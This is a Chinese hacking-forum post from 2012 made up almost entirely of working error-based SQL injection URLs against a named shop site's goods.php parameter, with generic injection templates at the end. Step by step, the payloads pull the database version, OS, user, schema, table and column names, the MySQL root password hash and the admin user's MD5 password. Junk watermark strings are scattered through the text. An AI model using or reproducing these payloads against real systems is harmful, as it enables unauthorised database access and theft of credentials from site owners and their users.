找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1979|回复: 0
打印 上一主题 下一主题

盲注详细内容

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-5 14:59:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
判断版本号 2 j) g2 a: v6 i0 j
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%235 ^  u6 }. Y+ U& D& q& W; m7 `& B
, ]4 X/ G& e) J* F1 c$ J& R
判断系统) c9 J& X+ |: x8 Y" K
) A  g/ p( |! |7 X
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
% S* _0 t% x; E' Q# N) |8 ]. J# s" N" w" I% M8 K

' u  l' T3 F8 W7 u5 Y$ N( e6 l( Q6 Q- O7 a/ w
当前 user()5 A, s6 d% H  R0 F$ M1 k8 R
& v% F/ x* U; h7 D# S6 Z! y
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23' _* o* ]/ g# O2 U) ~; r
- t+ j- J' R( b& N/ V( s, u
6 ~: d6 b  }% T7 c" U# U
8 |, A7 L: B4 e4 V. U5 U+ Z( p& H+ b# u1 y
当前 database()
; F" J+ a5 b* I* khttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23- Y  |# G9 B/ O) K) u% u: B

9 a1 i/ @6 L( M5 n  X2 L: ^8 O
" z, h# J5 G2 S2 z) q9 Q( I7 q4 B8 d6 u; q! M" T- ~1 S

7 a6 d  ?1 M4 L8 V$ `; _- z# J* lroot hash
$ f& u# B! c0 v3 A+ W; I, Y& x$ l- f" C, y6 [' |- O
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23) \4 h  M1 [7 E
* |. d( I. c; M+ H5 d$ Q& i# V
! R+ t7 y5 [$ Y8 q+ d& |# h
% Z4 {+ M4 Y1 y6 I2 \! V" t
当前 数据库表名4 z! y7 _& \& o4 Q+ a( Q! k' j

" p4 _7 d7 ]% Yhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
$ z/ h+ W1 Z: O9 [0 t. V1 t  r7 i8 v  [( X* Y: N, W

$ u$ {1 ?( i8 o) W# _% I0 [: t+ ?* S$ [9 j
当前 数据库 user_name 字段$ g; o7 Z  G& e3 q$ ~

! H0 @  F; S! s& y% J$ d& Ghttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
  |! W0 }4 P/ M8 v4 t3 H" g6 M( v! `/ R+ X- A6 ?6 Y. x# i& w$ ^( q
当前 数据库 字段 password$ u: \( l6 ~5 [2 @( d
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
  i5 Q# u$ X9 I% x* Y! g6 Z# W3 r
5 K+ L; Q9 {/ G0 Y

2 u5 B( D7 T& H! Q+ s获得 admin passwd(md5)5 r* |( s9 F0 d; {- [
7 {6 u( Z# R  R; }$ F+ B& {; j
& p  j5 l+ q4 \& Y6 _
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
/ n% ~" `! C% C; _8 m- N- u1 ]  ^- h" l( w
报错注射
1 ?" L# y7 K( m2 I9 KSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)/ [, ~. Z' k; z6 Z! ~

4 A; B+ p0 c4 K( oSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
- u: r! @7 H; P# W. f; ?3 M, @1 f" ]3 k4 U$ c8 d8 b
and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表